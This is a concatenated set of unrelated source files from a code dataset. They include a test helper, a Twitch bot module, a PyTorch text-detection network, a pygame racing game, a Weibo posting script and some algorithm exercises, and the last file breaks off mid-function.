REQUEST_TYPE_ONLINE:\n if 
http_method == GET_REQUEST_STR:\n response = requests.get(_REQUEST_URL, params=params).json()\n elif http_method == POST_REQUEST_STR:\n response = requests.post(_REQUEST_URL, data=params).json()\n elif http_method == DELETE_REQUEST_STR:\n response = requests.delete(_REQUEST_URL, data=params).json()\n else:\n raise ValueError(\"Unknown request type: %s, not in %s\" % (http_method, IMPLEMENTED_HTTP_METHODS))\n\n if 'message' in response:\n raise ValueError(\"Internal server error with params: %s\\nOutput: %s\" % (params, response))\n return response\n else:\n if http_method == GET_REQUEST_STR:\n d = {HTTP_METHOD_STR: http_method, 'queryStringParameters': params}\n elif http_method in [POST_REQUEST_STR, DELETE_REQUEST_STR]:\n d = {HTTP_METHOD_STR: http_method, 'body': urllib.parse.urlencode(params)}\n else:\n raise ValueError(\"Unknown request type: %s, not in %s\" % (http_method, IMPLEMENTED_HTTP_METHODS))\n\n # The return body is a string (because json.dumps) so we must call eval on it\n return json.loads(lambda_handler(d, None)['body'])\n\n\ndef random_str(size, all_ascii=True):\n \"\"\"\n Returns a random string of characters\n :param size: the number of characters to use\n :param all_ascii: if True, then the only characters returned will be ascii chars\n \"\"\"\n return ''.join(\n (random.choice(string.ascii_letters) if all_ascii else chr(random.randint(0, 255))) for i in range(size))\n\n\ndef random_valid_password_hash():\n \"\"\"\n Generates a random password that passes validity checks on the server\n \"\"\"\n return ''.join(random.choice(HASH_CHARS) for i in range(PASSWORD_HASH_SIZE))\n\n\ndef random_valid_username():\n \"\"\"\n Generates a random username that passes validity checks on the server, and probably isn't used by anyone\n \"\"\"\n return random_str(MAX_USERNAME_SIZE, all_ascii=True)\n\n\ndef random_valid_email():\n \"\"\"\n Generates a random email that passes validity checks on the server, and probably isn't used by anyone\n \"\"\"\n return 
random_str(64, all_ascii=True) + '@gmail.com'\n\n\ndef get_binary_permutations(n):\n \"\"\"\n Returns a list of strings of binary representations of all integers in range [0, 2**n)\n \"\"\"\n def pad(s):\n return ('0' * (n - len(s)) + s) if len(s) < n else s\n\n return [pad(bin(i)[2:]) for i in range(2 ** n)]\n\n\ndef read_recipe_info():\n ret = []\n ret_pics = []\n for i, file in enumerate(os.listdir(_INIT_RECIPES_DIR)):\n if file.endswith(\".txt\"):\n with open(os.path.join(_INIT_RECIPES_DIR, file), 'r') as f:\n fields = _split_list(f.readlines())\n ret.append(fields)\n ret_pics.append(os.path.join(_INIT_RECIPES_DIR, file.replace('.txt', '.jpg')))\n\n return ret, ret_pics\n\n\ndef _split_list(lines):\n ret = []\n curr = \"\"\n for line in lines:\n if line == '\\n':\n ret.append(curr[:-1])\n curr = \"\"\n else:\n curr += line\n return ret + [curr]\n","sub_path":"lambda/tests/LambdaTestUtils.py","file_name":"LambdaTestUtils.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"339645377","text":"import logging\nimport re\n\nfrom pajbot.modules import BaseModule, ModuleSetting\nfrom pajbot.models.command import Command\nfrom pajbot.models.handler import HandlerManager\n\nlog = logging.getLogger(__name__)\n\n\nclass SubAlertModule(BaseModule):\n\n ID = __name__.split('.')[-1]\n NAME = 'Subscription Alert (text)'\n DESCRIPTION = 'Prints a message in chat for someone who subscribed'\n CATEGORY = 'Feature'\n ENABLED_DEFAULT = True\n SETTINGS = [\n ModuleSetting(\n key='new_sub',\n label='New sub',\n type='text',\n required=True,\n placeholder='Sub hype! {username} just subscribed PogChamp',\n default='Sub hype! {username} just subscribed PogChamp',\n constraints={\n 'min_str_len': 10,\n 'max_str_len': 400,\n }),\n ModuleSetting(\n key='resub',\n label='Resub',\n type='text',\n required=True,\n placeholder='Resub hype! 
{username} just subscribed, {num_months} months in a row PogChamp <3 PogChamp',\n default='Resub hype! {username} just subscribed, {num_months} months in a row PogChamp <3 PogChamp',\n constraints={\n 'min_str_len': 10,\n 'max_str_len': 400,\n }),\n ]\n\n def __init__(self):\n super().__init__()\n self.new_sub_regex = re.compile('^(\\w+) just subscribed!')\n self.resub_regex = re.compile('^(\\w+) subscribed for (\\d+) months in a row!')\n\n def on_new_sub(self, user):\n \"\"\"\n A new user just subscribed.\n Send the event to the websocket manager, and send a customized message in chat.\n Also increase the number of active subscribers in the database by one.\n \"\"\"\n\n self.bot.kvi['active_subs'].inc()\n\n payload = {'username': user.username_raw}\n self.bot.websocket_manager.emit('new_sub', payload)\n\n self.bot.say(self.get_phrase('new_sub', **payload))\n\n def on_resub(self, user, num_months):\n \"\"\"\n A user just re-subscribed.\n Send the event to the websocket manager, and send a customized message in chat.\n \"\"\"\n\n payload = {'username': user.username_raw, 'num_months': num_months}\n self.bot.websocket_manager.emit('resub', payload)\n\n self.bot.say(self.get_phrase('resub', **payload))\n\n def on_message(self, source, message, emotes, whisper, urls, event):\n if whisper is False and source.username == 'twitchnotify':\n # Did twitchnotify tell us about a new sub?\n m = self.new_sub_regex.search(message)\n if m:\n username = m.group(1)\n self.on_new_sub(self.bot.users[username])\n else:\n # Did twitchnotify tell us about a resub?\n m = self.resub_regex.search(message)\n if m:\n username = m.group(1)\n num_months = m.group(2)\n self.on_resub(self.bot.users[username], int(num_months))\n\n def enable(self, bot):\n HandlerManager.add_handler('on_message', self.on_message)\n self.bot = bot\n\n def disable(self, bot):\n HandlerManager.remove_handler('on_message', 
self.on_message)\n","sub_path":"pajbot/modules/subalert.py","file_name":"subalert.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"653354965","text":"# This program will counts the frequency of characters on a string.\n\nimport pprint as pp\ntext = 'This a simple text to TEST the code.'\n\nletters = {}\n\nfor i in text:\n letters.setdefault(i, 0)\n letters[i] = letters[i]+1\n\npp.pprint(letters)","sub_path":"SomeProblems/Character_counter.py","file_name":"Character_counter.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"415941389","text":"from z3 import *\n\n\n\nx = Int('x')\ny = Int('y')\nsolve(x == x/2 + y/2, x>=0, y>=0, y <= x)\n#f = Function('f', IntSort(), IntSort())\n#solve(f(f(x)) == x, f(x) == y, x != y)\n\n","sub_path":"a1/z3test.py","file_name":"z3test.py","file_ext":"py","file_size_in_byte":170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"612203581","text":"from itertools import combinations\n\n\nn,m = map(int,input().split())\n\n\nmaps = []\n\n\nfor i in range(n):\n maps.append(list(map(int,input().split())))\n\n\nchickens = []\nhouse = []\n\n\nfor i in range(n):\n for j in range(n):\n if maps[i][j] == 2:\n chickens.append([i,j])\n elif maps[i][j] == 1:\n house.append([i,j])\n\n\n# 모든 조합구하기\ncombs = list(combinations(chickens,m))\n\nans = []\n\nfor chicks in combs:\n\n tot_dis = 0\n\n for h in house:\n hx,hy = h\n\n min_dis = 100\n\n for c in chicks:\n cx,cy = c\n\n tmp_num = abs(hx-cx) + abs(hy-cy)\n\n min_dis = min(min_dis,tmp_num)\n\n tot_dis+=min_dis\n\n 
ans.append(tot_dis)\n\nans.sort()\n\nprint(ans[0])","sub_path":"baekjoon/baekjoon15686.py","file_name":"baekjoon15686.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"528917122","text":"\nimport heapq\n\ndef read_input():\n m = int(input())\n adjacent = dict()\n for i in range(m):\n a, b, dep, dur = input().split()\n if int(dep) < 18:\n dep = int(dep) + 6\n else:\n dep = int(dep) + 6 - 24\n for city in (a, b):\n if city not in adjacent:\n adjacent[city] = []\n adjacent[a].append((dep, int(dur), b))\n s, t = input().split()\n return adjacent, s, t\n\ndef dijsktra(adjacent, s, t):\n if s == t:\n return [0,0]\n prior_q = [(0, 0, s)]\n heapq.heapify(prior_q)\n dist = dict()\n for city in adjacent:\n dist[city] = [float('inf'), 0]\n dist[s] = (0, 0)\n while prior_q:\n d, ar, u = heapq.heappop(prior_q)\n if u not in adjacent:\n return \n if d < dist[u][0]:\n dist[u] = [d, ar]\n for (dep_v, dur_v, v) in adjacent[u]:\n if 0 <= dep_v < 12 and dep_v + dur_v <= 12:\n if dist[v][0] == float('inf'):\n if u == s:\n time = dur_v\n else:\n if dist[u][1] <= dep_v:\n time = dist[u][0] + (dep_v - dist[u][1]) + dur_v\n else:\n time = dist[u][0] + (dep_v + 24 - dist[u][1]) + dur_v\n arrive_v = dep_v + dur_v\n heapq.heappush(prior_q, (time, arrive_v, v))\n if t in adjacent:\n return dist[t]\n else:\n return\n\nif __name__ == \"__main__\":\n test = int(input())\n for case in range(test):\n adjacent, s, t = read_input()\n res = dijsktra(adjacent, s, t)\n print('Test Case', str(case+1) + '.')\n if res is None or res[0] == float('inf'):\n print('There is no route Vladimir can take.')\n else:\n if res[1] >= res[0]%24:\n print('Vladimir needs', res[0]//24, 'litre(s) of blood.')\n else:\n print('Vladimir needs', res[0]//24 + 1, 'litre(s) of blood.')\n ","sub_path":"Online Judge/10187 - From Dusk Till Dawn.py","file_name":"10187 - From Dusk Till 
Dawn.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"61745318","text":"import torch.nn as nn\nimport torch\nimport torch.nn.functional as F\ntry:\n from vgg import *\n from resnet import *\n from senet import *\nexcept:\n from .vgg import *\n from .resnet import *\n from .senet import *\n\n\nclass Upsample(nn.Module):\n\n def __init__(self, in_channels, out_channels, multiply):\n super().__init__()\n self.conv5x5 = nn.Conv2d(\n in_channels, in_channels, kernel_size=5, stride=1, padding=2, bias=False)\n self.conv1x1_1 = nn.Conv2d(\n in_channels, in_channels, kernel_size=1, stride=1, padding=0, bias=False)\n self.conv1x1_2 = nn.Conv2d(\n in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=False)\n self.relu = nn.ReLU(inplace=True)\n self.multiply = multiply\n if multiply > 1:\n ratio = multiply/2\n self.deconv = nn.ConvTranspose2d(\n out_channels, out_channels, kernel_size=int(4*ratio), stride=int(2*ratio), padding=int(1*ratio))\n\n def forward(self, x):\n x = self.conv5x5(x)\n x = self.relu(x)\n x = self.conv1x1_1(x)\n x = self.relu(x)\n x = self.conv1x1_2(x)\n x = self.relu(x)\n if self.multiply > 1:\n x = self.deconv(x)\n return x\n\n\nresnet = {'resnet34': resnet34, 'resnet50': resnet50,\n 'resnet101': resnet101, 'resnet152': resnet152}\nvgg = {'vgg16': vgg16}\n\nse_net = {'se_resnext50_32x4d': se_resnext50_32x4d}\n\n\nclass TextFieldNet(nn.Module):\n\n def __init__(self, backbone='vgg16', output_channel=2):\n super().__init__()\n\n self.backbone_name = backbone\n self.output_channel = output_channel\n\n if backbone[0:3] == 'vgg':\n self.backbone = vgg[backbone]()\n self._make_upsample(expansion=1)\n elif backbone[0:6] == 'resnet':\n self.backbone = resnet[backbone]()\n expansion = 1 if backbone in ['resnet18', 'resnet34'] else 4\n self._make_upsample(expansion=expansion)\n elif backbone == 'se_resnext50_32x4d':\n self.backbone = 
se_net[backbone]()\n self._make_upsample(expansion=4)\n\n def _make_upsample(self, expansion=1):\n if self.backbone_name == 'vgg16':\n self.up5x4 = Upsample(512, 256, 4)\n self.up4x2 = Upsample(512, 256, 2)\n self.up3x1 = Upsample(256, 256, 1)\n self.up2x2 = nn.Sequential(\n nn.Conv2d(256*3, 512, kernel_size=1,\n stride=1, padding=0, bias=False),\n nn.ReLU(inplace=True),\n nn.Conv2d(512, 512, kernel_size=1,\n stride=1, padding=0, bias=False),\n nn.ReLU(inplace=True),\n nn.Conv2d(512, 2, kernel_size=1,\n stride=1, padding=0, bias=False)\n )\n self.up1x4 = nn.ConvTranspose2d(\n 2, 2, kernel_size=8, stride=4, padding=2, bias=False)\n else:\n pass\n\n def forward(self, x):\n # print('xxxxxxxxxxxx size',x.size())\n C1, C2, C3, C4, C5 = self.backbone(x)\n # print('c1', C1.size(), 'c2', C2.size(), 'c3',\n # C3.size(), 'c4', C4.size(), 'c5', C5.size())\n up5 = self.up5x4(C5)\n # print('up5',up5.size())\n up4 = self.up4x2(C4)\n # print('up4',up4.size())\n up3 = self.up3x1(C3)\n\n concat = torch.cat([up5, up4, up3], dim=1)\n # concat = self.concatx2(concat)\n # print('concat',concat.size())\n up2 = self.up2x2(concat)\n # print('up2',up2.size())\n up1 = self.up1x4(up2)\n # print(up1.size())\n return up1\n\n\nif __name__ == '__main__':\n import torch\n # input = torch.randn((1, 3, 768, 768))\n net = TextFieldNet(backbone='vgg16')\n # print(net(input).size())\n import torchsummary\n with torch.no_grad():\n print(torchsummary.summary(net, (3, 64, 64), batch_size=1, device='cpu'))\n exit()\n","sub_path":"torchtext/models/text_field_net.py","file_name":"text_field_net.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"567147461","text":"from xcp2k.inputsection import InputSection\nfrom _localize4 import _localize4\nfrom _current3 import _current3\nfrom _nmr1 import _nmr1\nfrom _spinspin1 import _spinspin1\nfrom _epr1 import _epr1\nfrom _polar1 import _polar1\nfrom _print64 import 
_print64\n\n\nclass _linres1(InputSection):\n def __init__(self):\n InputSection.__init__(self)\n self.Eps = None\n self.Max_iter = None\n self.Restart_every = None\n self.Preconditioner = None\n self.Energy_gap = None\n self.Restart = None\n self.Wfn_restart_file_name = None\n self.LOCALIZE = _localize4()\n self.CURRENT = _current3()\n self.NMR = _nmr1()\n self.SPINSPIN = _spinspin1()\n self.EPR = _epr1()\n self.POLAR = _polar1()\n self.PRINT = _print64()\n self._name = \"LINRES\"\n self._keywords = {'Wfn_restart_file_name': 'WFN_RESTART_FILE_NAME', 'Max_iter': 'MAX_ITER', 'Eps': 'EPS', 'Preconditioner': 'PRECONDITIONER', 'Energy_gap': 'ENERGY_GAP', 'Restart_every': 'RESTART_EVERY', 'Restart': 'RESTART'}\n self._subsections = {'POLAR': 'POLAR', 'NMR': 'NMR', 'EPR': 'EPR', 'CURRENT': 'CURRENT', 'PRINT': 'PRINT', 'SPINSPIN': 'SPINSPIN', 'LOCALIZE': 'LOCALIZE'}\n self._aliases = {'Restart_file_name': 'Wfn_restart_file_name'}\n\n\n @property\n def Restart_file_name(self):\n \"\"\"\n See documentation for Wfn_restart_file_name\n \"\"\"\n return self.Wfn_restart_file_name\n\n @Restart_file_name.setter\n def Restart_file_name(self, value):\n self.Wfn_restart_file_name = value\n","sub_path":"xcp2k/classes/_linres1.py","file_name":"_linres1.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"182584628","text":"from dataset_costants import TABLE_DICT\n\nPATH_TO_LABELS = '/content/TableTrainNet/data/object-detection.pbtxt'\nBMP_IMAGE_TEST_TO_PATH = '/content/TableTrainNet/test'\n\nNUM_CLASSES = 1\n\nPATHS_TO_TEST_IMAGE = [\n 'test/test1.png',\n 'test/test2.png',\n 'test/test3.png',\n 'test/test4.png',\n 'test/test5.png',\n 'test/test6.png',\n 'test/test7.png'\n]\n\nPATHS_TO_CKPTS = [\n '/content/ckpt/model.ckpt'\n]\n\nTEST_SCORES = [0.2, 0.4, 0.6, 0.8]\n\nMAX_NUM_BOXES = 
10\n","sub_path":"inference_costants.py","file_name":"inference_costants.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"199291584","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport requests\nimport base64\nimport binascii\nimport rsa\nimport re\nimport json\nimport time\nimport os\nimport random\nfrom ConfigUtils import Config\n\nclass Weibo(object):\n WBCLIENT = 'ssologin.js(v1.4.18)'\n user_agent = (\n\t 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) '\n 'Chrome/20.0.1132.57 Safari/536.11'\n )\n def __init__(self,config):\n self.config = config\n self.session = requests.session()\n self.session.headers = {\n \"User-Agent\":Weibo.user_agent\n }\n self.login()\n def encrypt_passwd(self,passwd, pubkey, servertime, nonce):\n key = rsa.PublicKey(int(pubkey, 16), int('10001', 16))\n message = str(servertime) + '\\t' + str(nonce) + '\\n' + str(passwd)\n passwd = rsa.encrypt(message.encode('utf-8'), key)\n return binascii.b2a_hex(passwd)\n\n def login(self):\n login = self.config.Login\n password = self.config.Password\n self.userName = self.config.UserName\n\n resp = self.session.get(\n 'http://login.sina.com.cn/sso/prelogin.php?'\n 'entry=weibo&callback=sinaSSOController.preloginCallBack&'\n 'su=%s&rsakt=mod&checkpin=1&client=%s' %\n (base64.b64encode(login.encode('utf-8')), Weibo.WBCLIENT)\n )\n\n pre_login_str = re.match(r'[^{]+({.+?})', resp.text).group(1)\n pre_login = json.loads(pre_login_str)\n data = {\n 'entry': 'weibo',\n 'gateway': 1,\n 'from': '',\n 'savestate': 7,\n 'userticket': 1,\n 'ssosimplelogin': 1,\n 'su': base64.b64encode(requests.utils.quote(login).encode('utf-8')),\n 'service': 'miniblog',\n 'servertime': pre_login['servertime'],\n 'nonce': pre_login['nonce'],\n 'vsnf': 1,\n 'vsnval': '',\n 'pwencode': 'rsa2',\n 'sp': self.encrypt_passwd(password, pre_login['pubkey'],\n pre_login['servertime'], pre_login['nonce']),\n 
'rsakv' : pre_login['rsakv'],\n 'encoding': 'UTF-8',\n 'prelt': '53',\n 'url': 'http://weibo.com/ajaxlogin.php?framelogin=1&callback=parent.si'\n 'naSSOController.feedBackUrlCallBack',\n 'returntype': 'META'\n }\n resp = self.session.post(\n 'http://login.sina.com.cn/sso/login.php?client=%s' % Weibo.WBCLIENT,\n data=data\n )\n \n login_url = re.search('replace\\\\(\\'([^\\']+)\\'\\\\)', resp.text).group(1) \n\n resp = self.session.get(login_url)\n login_str = login_str = re.search('\\((\\{.*\\})\\)', resp.text).group(1)\n\n login_info = json.loads(login_str)\n uniqueid = login_info[\"userinfo\"][\"uniqueid\"]\n self.uid = uniqueid.encode(\"ascii\")\n print(\"登录成功 uid:\"+self.uid)\n \n def postData(self,data):\n currTime = \"%d\" % (time.time()*1000)\n self.session.headers[\"Host\"]=\"weibo.com\"\n self.session.headers[\"Origin\"]=\"http://weibo.com\"\n Referer = \"http://www.weibo.com/u/%s/home?wvr=5\" % self.uid\n self.session.headers[\"Referer\"] = Referer\n resp = self.session.post(\n 'http://weibo.com/aj/mblog/add?ajwvr=6&__rnd=%s'%currTime,data = data\n )\n\n def postMessage(self,message):\n data = {\n 'location':'v6_content_home',\n 'text':message,\n 'appkey':'',\n 'style_type':1,\n 'pic_id':'',\n 'pdetail':'',\n 'rank':0,\n 'rankid':'',\n 'module':'stissue',\n 'pub_source':'main_',\n 'pub_type':'dialog',\n '_t':0\n }\n self.postData(data)\n print(message +\" 发送成功\")\n \n def postImage(self,message,filePath):\n file = open(filePath, 'r')\n payload = file.read()\n file.close()\n url = 'weibo.com/u/'+self.uid\n atName = \"@\"+self.userName\n \n self.session.headers[\"Referer\"] = \"http://js.t.sinajs.cn/t6/home/static/swf/MultiFilesUpload.swf?version=446d5fa804a6fbf9\"\n self.session.headers[\"Host\"]=\"picupload.service.weibo.com\"\n self.session.headers[\"Origin\"]=\"http://js.t.sinajs.cn\"\n resp = self.session.post(\n 'http://picupload.service.weibo.com/interface/pic_upload.php?app=miniblog'+\n 
'&data=1&url='+url+'&markpos=1&logo=1&nick='+atName+'&marks=1&url='+url+\n '&mime=image/png&ct='+str(random.random()),\n data=payload\n )\n \n resultStr = re.search('{\"code.*', resp.text).group(0)\n resultJson = json.loads(resultStr)\n pic_id = resultJson[\"data\"][\"pics\"][\"pic_1\"][\"pid\"]\n data = {\n 'location':'v6_content_home',\n 'text':message,\n 'appkey':'',\n 'style_type':1,\n 'pic_id':pic_id,\n 'pdetail':'',\n 'rank':0,\n 'rankid':'',\n 'module':'stissue',\n 'pub_source':'main_',\n 'pub_type':'dialog',\n '_t':0\n }\n self.postData(data)\n print(message +\" 发送成功\")\n \nif __name__ == '__main__':\n weibo = Weibo(Config())\n weibo.postMessage('你好')\n weibo.postImage('分享图片2','/Downloads/3.png')\n print('Finish')\n \n ","sub_path":"Weibo.py","file_name":"Weibo.py","file_ext":"py","file_size_in_byte":5385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"146157975","text":"# -*- coding: utf-8 -*-\n#Auto = 100 Pixel breit\ntry:\n import thread\nexcept ImportError:\n import _thread as thread #Py3K changed it.\nimport pygame, time\nimport pygame.mixer\nfrom random import randint #Zufallszahlen\npygame.init()\npygame.mixer.pre_init(44100, -16, 2, 2048) #setup mixer to avoid sound lag\n\n#Farben in RGB\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\ngreen = (0, 255, 0)\nblue = (0, 0, 255)\n\n#-----------------#Window Options#-----------------\nwindow_size = (800, 600) #1920, 1080\nwindow = pygame.display.set_mode((window_size), pygame.RESIZABLE)\npygame.display.set_caption(\"Street Racer!\")\npygame.display.set_icon(pygame.image.load(\"./assets/images/icon.png\"))\n\n\npkt = 0\n#-----------------#Resources#-----------------\nbg_1 = pygame.image.load(\"./assets/images/road_1.png\").convert()\nbg_2 = pygame.image.load(\"./assets/images/road_2.png\").convert()\nbg_3 = pygame.image.load(\"./assets/images/road_3.png\").convert()\ncar = pygame.image.load(\"./assets/images/car.png\")\n#Money 
Bag!\nmoney_bag = pygame.image.load(\"./assets/images/money_bag.png\")\nmoney_bag_counter = 0\nmoney_bag_leader = 0\nrandom_money_pointer = 0\nmoney_bag_score = 20\nmoney_collect = [1,2]\ncar_pointer = ([220, 430], [350, 430], [500, 430]) #x, y\ncrash_car_x = [220, 350, 500]\nbg_animation = (bg_1, bg_2, bg_3)\nbg_counter = 0\nmoney_bag_pointer = (245, 375, 525) #(220, 350, 500)\n#Wo das auto stehen wird --> siehe car_pointer\nplayer_pos = 0\n#Gegner\nenm1 = pygame.image.load(\"./assets/images/enemie_1.png\")\nenm2 = pygame.image.load(\"./assets/images/enemie_2.png\")\nenm3 = pygame.image.load(\"./assets/images/enemie_3.png\")\nran_enm = (enm1, enm2, enm3)\nenm_counter = 0\ny_enm_leader = 0 #Geschwindigeit wie schnell gegner\nglobal speedo\nspeedo = 1\nenm_x_pointer = (220, 350, 500)\nenm_crash = [1, 2]\n\nmusic_on = False\nsound1 = pygame.mixer.Sound(\"./assets/sounds/sound1.ogg\")\nsound2 = pygame.mixer.Sound(\"./assets/sounds/sound2.ogg\")\nsound3 = pygame.mixer.Sound(\"./assets/sounds/sound3.ogg\")\nsound4 = pygame.mixer.Sound(\"./assets/sounds/sound4.ogg\")\nchime = pygame.mixer.Sound(\"./assets/sounds/chime.wav\")\nsound1.set_volume(0.2)\nsound2.set_volume(0.2)\nchime.set_volume(0.2)\nsound3.set_volume(0.2)\nsound4.set_volume(0.2)\n\n#-----------------#Functions#-----------------\ndef Text_on_screen(msg, color, size, pos):\n font = pygame.font.SysFont(None, size)\n screen_text = font.render(msg, True, color)\n window.blit(screen_text, pos)\n\ndef Level_up():\n global speedo\n global Cur_Level\n global fps\n fps = 30\n Cur_Level = 1\n if pkt >= 0: # LvL 1\n speedo = 10\n if pkt >= 200: # LvL 2\n Cur_Level += 1\n speedo = 20\n if pkt >= 600: # LvL 3\n Cur_Level += 1\n speedo = 15\n if pkt >= 1400: # LvL 4\n Cur_Level += 1\n speedo = 20\n if pkt >= 2000: # LvL 5\n Cur_Level += 1\n speedo = 25\n if pkt >= 3000: # LvL 6\n Cur_Level += 1\n speedo = 15\n fps = 60\n if pkt >= 4000: # LvL 7\n Cur_Level += 1\n speedo = 20\n if pkt >= 5000: # LvL 8\n Cur_Level += 1\n 
speedo = 25\n #Blinkender Text! :D\n if pkt in range(3000,3050) or pkt in range(3100, 3150) or pkt in range(3200, 3250):\n Text_on_screen(\"Hurry Up!\", red, 35, [670, 150])\n chime.play()\n\n\"\"\"if abfrag erstellen falls M schon gedrückt wurde. Musik kann doppelt\nabespielt werden aber die alte spur leider nicht gestoppt werden\"\"\"\n#Gefixt!\ndef random_music():\n global music_pointer\n global playlist\n global music_on\n if music_on == False:\n playlist = (sound1, sound2, sound3, sound4)\n ran = randint(0,3)\n music_pointer = ran\n playlist[ran].play()\n music_on = True\n\n#-----------------#Main Loop#-----------------\nclose = False\nwindow.blit(bg_1, [0, 0])\npygame.display.flip()\n\nclock = pygame.time.Clock()\nfps = 30\nglobal Cur_Level\n\n\nwhile not close:\n for event in pygame.event.get():\n #print (event)\n if event.type == pygame.QUIT:\n pygame.quit()\n close = True\n if event.type == pygame.KEYDOWN:\n if event.key is pygame.K_ESCAPE:\n pygame.quit()\n close = True\n #Test von Animation BG\n elif event.key == pygame.K_1:\n window.blit(bg_1, [0, 0])\n elif event.key == pygame.K_2:\n window.blit(bg_2, [0, 0])\n elif event.key == pygame.K_3:\n window.blit(bg_3, [0, 0])\n #4 if zeilen nur fürs movement\n elif event.key == pygame.K_LEFT:\n player_pos -= 1\n elif event.key == pygame.K_RIGHT:\n player_pos += 1\n elif event.key == pygame.K_m:\n random_music()\n elif event.key == pygame.K_n:\n playlist[music_pointer].stop()\n music_on = False\n if player_pos > 2:\n player_pos = 2\n if player_pos <= 0:\n player_pos = 0\n bg_counter += 1\n if bg_counter == 3:\n bg_counter = 0\n window.blit(bg_animation[bg_counter], [0, 0])\n window.blit(car, car_pointer[player_pos])\n if enm_counter <= 1: # Gegner Spawnen ab hier\n rnd = randint(0, 2)\n random = int(rnd)\n enm_counter += 1\n if y_enm_leader <= 600:\n window.blit(ran_enm[random], [enm_x_pointer[random], y_enm_leader])\n elif y_enm_leader >= 600:\n #-150 damit gegner noch \"ausserhalb\" spawnen\n y_enm_leader = 
-150\n enm_counter -= 1\n y_enm_leader += speedo # Geschwindigkeit des gegners\n #--------------------Money Bag!-----------------------------\n if money_bag_counter == 0:\n money_chance = randint(1, 100)\n if money_bag_counter == 0 and money_chance in range(1,3):\n rnd_mon = randint(0, 2)\n random_money = int(rnd_mon)\n money_bag_counter = 1\n if money_bag_leader <= 600 and money_bag_counter >= 1:\n window.blit(money_bag, [money_bag_pointer[random_money],money_bag_leader])\n if money_bag_leader >= 600:\n #-150 damit money bag noch \"ausserhalb\" spawnt\n money_bag_leader = -150\n money_bag_counter = 0\n if money_bag_counter == 1:\n money_bag_leader += speedo\n #Pointer um crash zu erkennen\n enm_crash[0] = enm_x_pointer[random]\n enm_crash[1] = y_enm_leader\n try:\n money_collect[0] = money_bag_pointer[random_money]\n money_collect[1] = money_bag_leader\n except:\n pass\n if enm_crash[0] == crash_car_x[player_pos] and enm_crash[1] >= 320:\n window.blit(bg_1, [0, 0])\n Text_on_screen(\"GAME OVER\", red, 100, [200, 300])\n pygame.display.update()\n time.sleep(1)\n pkt = 0\n if money_collect[0] == crash_car_x[player_pos] + 25 and money_collect[1] >= 350:\n money_bag_str = str(money_bag_score)\n #Text_on_screen(money_bag_str + \" Pkt!\", red, 25, [670, 150])\n thread.start_new_thread(Text_on_screen, (money_bag_str + \" Pkt!\", red, 25, [670, 150]))\n money_bag_counter = 0\n money_bag_leader = -150\n pkt += money_bag_score\n pkt += 1\n pkt_anzeige = str(pkt)\n Level_up()\n Text_on_screen(\"Punkte: \" + pkt_anzeige, red, 25, [670, 100])\n Cur_Level_str = str(Cur_Level)\n Text_on_screen(\"Level: \" + Cur_Level_str, red, 25, [670, 80])\n pygame.display.update()\n clock.tick(fps)\n\npygame.quit()\nquit()\n","sub_path":"Street_Race/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"360119005","text":"#!/usr/bin/python3\nimport argparse\nimport 
json\nimport os\nfrom shutil import copyfile\n\n\ndef filter_by_label(label_info, selected_labels):\n filtered = {}\n for key in label_info.keys():\n label = label_info[key]['label']\n if label in selected_labels:\n filtered[key] = label_info[key]\n return filtered\n\n\ndef find_and_count_labels(label_path, p, selected_labels):\n print(label_path)\n print('Labels count for the [ {} ] dataset.'.format(p.upper()))\n label_count = {}\n label_instances = {}\n with open(label_path) as f:\n label_info = json.load(f)\n for key in label_info.keys():\n label = label_info[key]['label']\n if label in label_count:\n label_count[label] = label_count[label] + 1\n label_instances[label].append(key)\n else:\n label_count[label] = 1\n label_instances[label] = [key]\n\n if len(selected_labels) > 0:\n for label in selected_labels:\n print('{} \\t {}'.format(label, label_count[label]))\n else:\n for label in sorted(label_count.keys()):\n print('{} \\t {}'.format(label, label_count[label]))\n\n\ndef update_label_index(filtered_info, selected_labels):\n for key in filtered_info.keys():\n label = filtered_info[key]['label']\n index = selected_labels.index(label)\n filtered_info[key]['label_index'] = index\n\n\ndef find_and_slice_labels(source_data_path, source_label_path, target_data_path, target_label_path, p, selected_labels):\n print(source_label_path)\n print(target_label_path)\n if not os.path.exists(target_data_path):\n os.makedirs(target_data_path)\n\n with open(source_label_path) as input:\n label_info = json.load(input)\n filtered_info = filter_by_label(label_info, selected_labels)\n update_label_index(filtered_info, selected_labels)\n\n with open(target_label_path, 'w') as output:\n json.dump(filtered_info, output, indent=3)\n\n for key in filtered_info.keys():\n source_file = '{}/{}.json'.format(source_data_path, key)\n target_file = '{}/{}.json'.format(target_data_path, key)\n with open(source_file) as video_input_file:\n video_input = json.load(video_input_file)\n label = 
